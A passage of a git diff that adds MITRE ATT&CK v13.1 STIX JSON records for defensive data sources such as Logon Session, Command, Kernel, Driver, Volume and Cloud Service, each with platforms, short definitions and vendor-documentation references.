"source_name": "Amazon IAM Groups", + "description": "Amazon. (n.d.). IAM user groups. Retrieved October 13, 2021.", + "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html" + } + ], + "modified": "2022-03-30T14:26:51.805Z", + "name": "Group", + "description": "A collection of multiple user accounts that share the same access rights to the computer and/or network resources and have common security rights(Citation: Amazon IAM Groups)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--40269753-26bd-437b-986e-159c66dec5e4.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--40269753-26bd-437b-986e-159c66dec5e4.json new file mode 100644 index 0000000000000000000000000000000000000000..dbedac609870fd258ab523bf0f1feab9ce0d5844 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--40269753-26bd-437b-986e-159c66dec5e4.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--dff8fa99-c2de-4a24-b0ae-6be2376ee0dc", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Google Workspace", + "IaaS", + "Linux", + "Office 365", + "SaaS", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--40269753-26bd-437b-986e-159c66dec5e4", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0015", + "external_id": "DS0015" + }, + { + "source_name": "Confluence Logs", + "description": "Confluence Support. (2021, April 22). Working with Confluence Logs. Retrieved September 23, 2021.", + "url": "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + } + ], + "modified": "2022-05-11T14:00:00.188Z", + "name": "Application Log", + "description": "Events collected by third-party services such as mail servers, web applications, or other appliances (not by the native OS or platform)(Citation: Confluence Logs)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891.json new file mode 100644 index 0000000000000000000000000000000000000000..c2a334646506ef8a13b3e0aca4fc5b360fdf349a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--34051c0b-e416-4cfd-b272-692045cb38a3", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-12-07T19:45:09.019Z", + "name": "Logon Session", + "description": "Logon occurring on a system or resource (local, domain, or cloud) to which a user/device is gaining access after successful authentication and authorization(Citation: Microsoft Audit Logon Events)", + "x_mitre_platforms": [ + "Azure AD", + "Google Workspace", + "IaaS", + "Linux", + "Office 365", + "SaaS", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host", + "Network" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0028", + "external_id": "DS0028" + }, + { + "source_name": "Microsoft Audit Logon Events", + "description": "Microsoft. (2021, September 6). Audit logon events. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--45232bc0-e858-440d-aa93-d48c6cf167f0.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--45232bc0-e858-440d-aa93-d48c6cf167f0.json new file mode 100644 index 0000000000000000000000000000000000000000..885dce6dab364bf46c925bfd070bac692b4d47ef --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--45232bc0-e858-440d-aa93-d48c6cf167f0.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--6540dda7-e2c2-4d46-a1c0-ae598e850d0c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "IaaS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--45232bc0-e858-440d-aa93-d48c6cf167f0", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0030", + "external_id": "DS0030" + }, + { + "source_name": "Amazon VM", + "description": "Microsoft. (n.d.). What is a virtual machine (VM)?. Retrieved October 13, 2021.", + "url": "https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/" + }, + { + "source_name": "Google VM", + "description": "Google. (n.d.). Virtual machine instances. Retrieved October 13, 2021.", + "url": "https://cloud.google.com/compute/docs/instances" + } + ], + "modified": "2021-10-20T15:05:19.274Z", + "name": "Instance", + "description": "A virtual server environment which runs workloads, hosted on-premise or by third-party cloud providers(Citation: Amazon VM)(Citation: Google VM)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--4523e7f3-8de2-4078-96f8-1227eb537159.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--4523e7f3-8de2-4078-96f8-1227eb537159.json new file mode 100644 index 0000000000000000000000000000000000000000..8037a5d4e2c2ecca213aef3706ff0071815da10c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--4523e7f3-8de2-4078-96f8-1227eb537159.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--8ff5b72e-e397-468a-b81d-41ae0b357eb6", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-20T18:38:40.409Z", + "name": "Sensor Health", + "description": "Information from host telemetry providing insights about system status, errors, or other notable functional activity", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--4523e7f3-8de2-4078-96f8-1227eb537159", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0013", + "external_id": "DS0013" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9.json new file mode 100644 index 0000000000000000000000000000000000000000..8c1239c1115538ff9513dec182ad0093ddfbbb29 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--fc453ec3-a687-4034-9768-12d798b83b0d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-12-07T19:35:34.863Z", + "name": "File", + "description": "A computer resource object, managed by the I/O system, for storing data (such as images, text, videos, computer programs, or any wide variety of other media).(Citation: Microsoft File Mgmt)", + "x_mitre_platforms": [ + "Linux", + "Network", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0022", + "external_id": "DS0022" + }, + { + "source_name": "Microsoft File Mgmt", + "description": "Microsoft. (2018, May 31). File Management (Local File Systems). Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065.json new file mode 100644 index 0000000000000000000000000000000000000000..ae77651559fe6a350f7d4066b8f8cdfe57178e47 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--83edd6e1-4b9b-4937-b81a-2b014cdcb2eb", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0016", + "external_id": "DS0016" + }, + { + "source_name": "Sysmon EID 9", + "description": "Russinovich, R. & Garnier, T. (2021, August 18). Sysmon Event ID 9. Retrieved September 24, 2021.", + "url": "https://docs.microsoft.com/sysinternals/downloads/sysmon#event-id-9-rawaccessread" + } + ], + "modified": "2022-03-30T14:26:51.804Z", + "name": "Drive", + "description": "A non-volatile data storage device (hard drive, floppy disk, USB flash drive) with at least one formatted partition, typically mounted to the file system and/or assigned a drive letter(Citation: Sysmon EID 9)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--6d7de3b7-283d-48f9-909c-60d123d9d768.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--6d7de3b7-283d-48f9-909c-60d123d9d768.json new file mode 100644 index 0000000000000000000000000000000000000000..6592a67a5577fb8e12e1d841ec0b033988860d49 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--6d7de3b7-283d-48f9-909c-60d123d9d768.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--291aa6cf-2d70-4579-bd50-68192c3227dc", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "IaaS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--6d7de3b7-283d-48f9-909c-60d123d9d768", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0020", + "external_id": "DS0020" + }, + { + "source_name": "Microsoft Snapshot", + "description": "Microsoft. (2021, September 16). Create a snapshot of a virtual hard disk. Retrieved October 13, 2021.", + "url": "https://docs.microsoft.com/en-us/azure/virtual-machines/linux/snapshot-copy-managed-disk" + }, + { + "source_name": "Amazon Snapshots", + "description": "Amazon. (n.d.). Amazon EBS snapshots. Retrieved October 13, 2021.", + "url": "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSSnapshots.html" + } + ], + "modified": "2021-11-10T09:30:48.698Z", + "name": "Snapshot", + "description": "A point-in-time copy of cloud volumes (files, settings, etc.) that can be created and/or deployed in cloud environments(Citation: Microsoft Snapshot)(Citation: Amazon Snapshots)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089.json new file mode 100644 index 0000000000000000000000000000000000000000..78e2fcf5e3b008b5e326e914f5ea5d41de6e295c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089.json @@ -0,0 +1,62 @@ +{ + "type": "bundle", + "id": "bundle--6addcea6-7164-47e6-ac9c-d5a8ae77ccd0", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-20T18:38:00.625Z", + "name": "Command", + "description": "A directive given to a computer program, acting as an interpreter of some kind, in order to perform a specific task(Citation: Confluence Linux Command Line)(Citation: Audit OSX)", + "x_mitre_platforms": [ + "Containers", + "Linux", + "Network", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "Austin Clark, @c2defense" + ], + "x_mitre_collection_layers": [ + "Container", + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0017", + "external_id": "DS0017" + }, + { + "source_name": "Confluence Linux Command Line", + "description": "Confluence Support. (2021, September 8). How to enable command line audit logging in linux. Retrieved September 23, 2021.", + "url": "https://confluence.atlassian.com/confkb/how-to-enable-command-line-audit-logging-in-linux-956166545.html" + }, + { + "source_name": "Audit OSX", + "description": "Gagliardi, R. (n.d.). Audit in a OS X System. Retrieved September 23, 2021.", + "url": "https://www.scip.ch/en/?labs.20150108" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--8765a845-dea1-4cd1-a56f-f54939b7ab9e.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--8765a845-dea1-4cd1-a56f-f54939b7ab9e.json new file mode 100644 index 0000000000000000000000000000000000000000..20f95186974983da8a744fd22ae08cfa06cbe4f4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--8765a845-dea1-4cd1-a56f-f54939b7ab9e.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--2f6f3d8f-d018-442e-8f78-3dccfd6ecb1e", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--8765a845-dea1-4cd1-a56f-f54939b7ab9e", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0008", + "external_id": "DS0008" + }, + { + "source_name": "STIG Audit Kernel Modules", + "description": "Unified Compliance Framework. (2016, December 20). The audit system must be configured to audit the loading and unloading of dynamic kernel modules.. Retrieved September 28, 2021.", + "url": "https://www.stigviewer.com/stig/oracle_linux_5/2016-12-20/finding/V-22383" + }, + { + "source_name": "Init Man Page", + "description": "Kerrisk, M. (2021, March 22). INIT_MODULE(2). Retrieved September 28, 2021.", + "url": "https://man7.org/linux/man-pages/man2/init_module.2.html" + } + ], + "modified": "2021-11-10T09:30:48.696Z", + "name": "Kernel", + "description": "A computer program, at the core of a computer OS, that resides in memory and facilitates interactions between hardware and software components(Citation: STIG Audit Kernel Modules)(Citation: Init Man Page)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--9ec8c0d7-6137-456f-b829-c5f8b96ba054.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--9ec8c0d7-6137-456f-b829-c5f8b96ba054.json new file mode 100644 index 0000000000000000000000000000000000000000..2724e0e4a2ce355abc02a79385c7f260b91c036d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--9ec8c0d7-6137-456f-b829-c5f8b96ba054.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--a378a551-f2fc-4580-be44-bcfb3b521802", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--9ec8c0d7-6137-456f-b829-c5f8b96ba054", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0027", + "external_id": "DS0027" + }, + { + "source_name": "IOKit Fundamentals", + "description": "Apple. (2014, April 9). What Is the I/O Kit?. Retrieved September 24, 2021.", + "url": "https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html" + }, + { + "source_name": "Windows Getting Started Drivers", + "description": "Viviano, A. (2021, August 17). Getting started with Windows drivers: User mode and kernel mode. Retrieved September 24, 2021.", + "url": "https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode" + } + ], + "modified": "2022-03-30T14:26:51.805Z", + "name": "Driver", + "description": "A computer program that operates or controls a particular type of device that is attached to a computer. Provides a software interface to hardware devices, enabling operating systems and other computer programs to access hardware functions without needing to know precise details about the hardware being used(Citation: IOKit Fundamentals)(Citation: Windows Getting Started Drivers)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--b0b6d26f-3747-4444-ac7a-239a6ff80cb5.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--b0b6d26f-3747-4444-ac7a-239a6ff80cb5.json new file mode 100644 index 0000000000000000000000000000000000000000..758bdfa8ccddd4fb1943bca63ae81a9d19b9e8e2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--b0b6d26f-3747-4444-ac7a-239a6ff80cb5.json @@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--23cc5bc1-45bf-47bf-919f-667d5f4d51c7", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "IaaS", + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--b0b6d26f-3747-4444-ac7a-239a6ff80cb5", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0034", + "external_id": "DS0034" + }, + { + "source_name": "Amazon S3", + "description": "Amazon. (n.d.). Amazon S3. Retrieved October 13, 2021.", + "url": "https://aws.amazon.com/s3/" + }, + { + "source_name": "Azure Blob Storage", + "description": "Microsoft. (n.d.). Azure Blob Storage. Retrieved October 13, 2021.", + "url": "https://azure.microsoft.com/en-us/services/storage/blobs/" + }, + { + "source_name": "Google Cloud Storage", + "description": "Google. (n.d.). Cloud Storage. Retrieved October 13, 2021.", + "url": "https://cloud.google.com/storage" + } + ], + "modified": "2022-03-30T14:26:51.807Z", + "name": "Volume", + "description": "Block object storage hosted on-premise or by third-party providers, typically made available to resources as virtualized hard drives(Citation: Amazon S3)(Citation: Azure Blob Storage)(Citation: Google Cloud Storage)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--b1ddede4-cafe-4955-ac4c-14b33ac3f647.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--b1ddede4-cafe-4955-ac4c-14b33ac3f647.json new file mode 100644 index 0000000000000000000000000000000000000000..71c9e3d69b797435ff0d859b96eac75c0c294e8b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--b1ddede4-cafe-4955-ac4c-14b33ac3f647.json @@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--72b6ef56-41b5-449b-8d42-a53271b189ae", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Azure AD", + "Google Workspace", + "IaaS", + "Office 365", + "SaaS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--b1ddede4-cafe-4955-ac4c-14b33ac3f647", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0025", + "external_id": "DS0025" + }, + { + "source_name": "Amazon AWS", + "description": "Amazon. (n.d.). Start Building on AWS Today. Retrieved October 13, 2021.", + "url": "https://aws.amazon.com" + }, + { + "source_name": "Azure Products", + "description": "Microsoft. (n.d.). Azure products. Retrieved October 13, 2021.", + "url": "https://azure.microsoft.com/en-us/services/" + } + ], + "modified": "2022-03-30T14:26:51.804Z", + "name": "Cloud Service", + "description": "Infrastructure, platforms, or software that are hosted on-premise or by third-party providers, made available to users through network connections and/or APIs(Citation: Amazon AWS)(Citation: Azure Products)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--b86d9b40-5fbe-4ef1-8dc3-263eff26f495.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--b86d9b40-5fbe-4ef1-8dc3-263eff26f495.json new file mode 100644 index 0000000000000000000000000000000000000000..5fa1fe3a7f9ed72ad5b5d10a3ca278dcd09e80cf --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--b86d9b40-5fbe-4ef1-8dc3-263eff26f495.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--1fb6750a-0257-41ec-91c0-b93165068b0b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-12-07T19:49:46.256Z", + "name": "Malware Repository", + "description": "Information obtained (via shared or submitted samples) regarding malicious software (droppers, backdoors, etc.) used by adversaries", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_collection_layers": [ + "OSINT" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--b86d9b40-5fbe-4ef1-8dc3-263eff26f495", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0004", + "external_id": "DS0004" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--ba27545a-9c32-47ea-ba6a-cce50f1b326e.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--ba27545a-9c32-47ea-ba6a-cce50f1b326e.json new file mode 100644 index 0000000000000000000000000000000000000000..6120f2fcb6fbefe6694b704fe67c35d105fdc0d7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--ba27545a-9c32-47ea-ba6a-cce50f1b326e.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--cc429039-19b2-4bcd-9bbe-d50284ad6c7f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", 